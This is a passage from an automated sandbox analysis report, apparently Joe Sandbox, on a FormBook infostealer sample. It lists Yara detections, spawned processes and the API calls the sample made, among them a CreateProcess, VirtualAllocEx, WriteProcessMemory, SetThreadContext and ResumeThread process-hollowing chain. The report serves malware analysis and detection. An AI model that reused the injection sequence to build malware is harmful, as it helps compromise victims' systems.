                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:08:51:09
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:16'696'840 bytes
                                                                                                                                                                                                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:08:51:09
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                                                                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                                                                                                File size:27'648 bytes
                                                                                                                                                                                                                                MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:08:51:34
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6881c0000
                                                                                                                                                                                                                                File size:597'432 bytes
                                                                                                                                                                                                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:9.7%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:250
                                                                                                                                                                                                                                  Total number of Limit Nodes:16

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 294 193d409-193d4a7 GetCurrentProcess 298 193d4b0-193d4e4 GetCurrentThread 294->298 299 193d4a9-193d4af 294->299 300 193d4e6-193d4ec 298->300 301 193d4ed-193d521 GetCurrentProcess 298->301 299->298 300->301 303 193d523-193d529 301->303 304 193d52a-193d545 call 193d5e7 301->304 303->304 307 193d54b-193d57a GetCurrentThreadId 304->307 308 193d583-193d5e5 307->308 309 193d57c-193d582 307->309 309->308
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0193D496
                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0193D4D3
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0193D510
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0193D569
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                                                                                  • Opcode ID: d2669dd93709e3752b1c43ff25a49a26774557be3ecfa09521ab8ee6969d10ae
                                                                                                                                                                                                                                  • Instruction ID: cf5a7837ca630aabd9f1ffa791831dce3308aa012dba88cbf70d1354a8e5d199
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2669dd93709e3752b1c43ff25a49a26774557be3ecfa09521ab8ee6969d10ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F514AB09003498FDB14CFAAD5887AEBFF5BF89304F208459D809A7350D738A984CF65

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 316 193d418-193d4a7 GetCurrentProcess 320 193d4b0-193d4e4 GetCurrentThread 316->320 321 193d4a9-193d4af 316->321 322 193d4e6-193d4ec 320->322 323 193d4ed-193d521 GetCurrentProcess 320->323 321->320 322->323 325 193d523-193d529 323->325 326 193d52a-193d545 call 193d5e7 323->326 325->326 329 193d54b-193d57a GetCurrentThreadId 326->329 330 193d583-193d5e5 329->330 331 193d57c-193d582 329->331 331->330
APIs
• GetCurrentProcess.KERNEL32 ref: 0193D496
• GetCurrentThread.KERNEL32 ref: 0193D4D3
• GetCurrentProcess.KERNEL32 ref: 0193D510
• GetCurrentThreadId.KERNEL32 ref: 0193D569
Memory Dump Source
• Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Memory Dump Source
• Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079570BE
Memory Dump Source
• Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079570BE
Memory Dump Source
• Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0193B3DE
Memory Dump Source
• Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0

APIs
• CreateActCtxA.KERNEL32(?), ref: 019359A9
Memory Dump Source
• Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
                                                                                                                                                                                                                                  • Opcode ID: 9af5cd8e801f012892d9fc2438c3c2537d2382e378114f4ff06d22e2806a4877
                                                                                                                                                                                                                                  • Instruction ID: c71b54501143574d0e26031b843c1671d79a0f7bc5e5a47376361a5bc3c9bfb9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9af5cd8e801f012892d9fc2438c3c2537d2382e378114f4ff06d22e2806a4877
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5241C2B1C0075DCBDB24CFAAC884BDEBBB5BF89304F60806AD448AB251DB756945CF50

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 723 19358ed-19358ee 724 19358f8-19359b9 CreateActCtxA 723->724 726 19359c2-1935a1c 724->726 727 19359bb-19359c1 724->727 734 1935a2b-1935a2f 726->734 735 1935a1e-1935a21 726->735 727->726 736 1935a31-1935a3d 734->736 737 1935a40 734->737 735->734 736->737 739 1935a41 737->739 739->739
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 019359A9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                  • Opcode ID: 4d8245d436b5f0bcf8a12fa7de65ed2af32c78706d10c82456e02d4cef47e463
                                                                                                                                                                                                                                  • Instruction ID: b83f7dce495b387b64c0bd610aa928eb06d8f94c5f69912cb221fc505daa4de4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d8245d436b5f0bcf8a12fa7de65ed2af32c78706d10c82456e02d4cef47e463
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0441D1B1C0031CCBDB24CFAAC884BDEBBB5BF89304F60805AD808AB251DB756949CF50

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 740 1939c90-1939c9c 741 1939cb5-1939d43 740->741 742 1939c9e-1939cb2 740->742 743 1939d45-1939d48 741->743 744 1939d4b-1939d4f 741->744 742->741 743->744 745 1939d51-1939d54 744->745 746 1939d57-1939d83 FindWindowW 744->746 745->746 747 1939d85-1939d8b 746->747 748 1939d8c-1939da0 746->748 747->748
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 01939D76
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 134000473-0
                                                                                                                                                                                                                                  • Opcode ID: ef1d00cf60da983efa1fcfcc658363a8c543b943b61b77e5c79f506acb5ea9ca
                                                                                                                                                                                                                                  • Instruction ID: 372adcbb34ea6cfbdaa8090f05efe132e3bf5696c798759640ea29290a03d24d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef1d00cf60da983efa1fcfcc658363a8c543b943b61b77e5c79f506acb5ea9ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E4177B6C043848FEB50CFA9E8857CABBF5BB66314F0A805EC808A7206D3795849CB51

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 750 7956dc9-7956dcc 751 7956d5c-7956d7d ReadProcessMemory 750->751 752 7956dce-7956e42 750->752 753 7956d86-7956db6 751->753 754 7956d7f-7956d85 751->754 761 7956e44-7956e4a 752->761 762 7956e4b-7956e70 752->762 754->753 761->762
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07956D70
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                                                  • Opcode ID: 949bccf39ca2f4ac2ed3cfcc6d9e0c879c6be5a032fae605ef49388afc236a23
                                                                                                                                                                                                                                  • Instruction ID: e3dc62c0b7dce706e0794d462316c6d198a7fdab3ba8342af74586318c7d3538
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 949bccf39ca2f4ac2ed3cfcc6d9e0c879c6be5a032fae605ef49388afc236a23
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1318DB6D003598ECB20CFA9C8447EEFFF4AF88324F14881AC459A7250C7399555CBA1

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  control_flow_graph 766 1939bc8-1939bd4 767 1939bd6-1939be8 766->767 768 1939bea-1939bfb 766->768 767->768 769 1939b86-1939b8e 768->769 770 1939bfc-1939c24 768->770 771 1939b90-1939b9c call 19385bc 769->771 772 1939bb9-1939bc1 769->772 775 1939c72-1939c8b 770->775 776 1939c26-1939c4e GetSystemMetrics 770->776 778 1939ba1-1939ba3 771->778 779 1939c50-1939c56 776->779 780 1939c57-1939c6b 776->780 778->772 781 1939ba5-1939bb2 call 1935334 778->781 779->780 780->775 781->772 785 1939bb4 781->785 785->772
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004B), ref: 01939C3D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4116985748-0
                                                                                                                                                                                                                                  • Opcode ID: 796b2772e71e4f6c4cf6eb4951dc534ba96599f7da5f60067a80898cd9a2f874
                                                                                                                                                                                                                                  • Instruction ID: 96ea57e86dfbfa996d15f3206f84ba02dd4828427495f5b2f37b5550df683f9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 796b2772e71e4f6c4cf6eb4951dc534ba96599f7da5f60067a80898cd9a2f874
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A31E3B4804345CFEB20CF99D5443AEBBF8FB95319F1440AED949AB282D3789904CFA1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07956C90
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                                                  • Opcode ID: fdb3c24aafefe203e8e9406d9760a651dc3dbe26da812239704ba7722ca96fce
                                                                                                                                                                                                                                  • Instruction ID: baa67a242beb610e3396076a684acc54b75d782bc6615ce26b71d9f060348244
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdb3c24aafefe203e8e9406d9760a651dc3dbe26da812239704ba7722ca96fce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F215AB6D003599FCB10CFA9C985BDEBBF5FF48314F10882AE958A7240D7789954CB60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07956C90
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                                                  • Opcode ID: 560483d46a7d48ac3e1ca2f181c8c9e9712990f445b5cf08ac1e0988e12cb74a
                                                                                                                                                                                                                                  • Instruction ID: 76a43da3731c22ec403cad5a1be447f18a85e6d986431fb93fbdf69c61d287c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 560483d46a7d48ac3e1ca2f181c8c9e9712990f445b5cf08ac1e0988e12cb74a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3216BB5D003199FCB10CFAAC880BDEBBF5FF48314F508429E958A7240C7789950CBA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07956D70
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07956AE6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07956AE6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07956D70
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0193D6E7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0193D6E7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 01939D76
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 134000473-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 01939D76
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 134000473-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07956BAE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07956BAE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0193B3DE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07959175
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07959175
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                                                                  Memory Dump Source
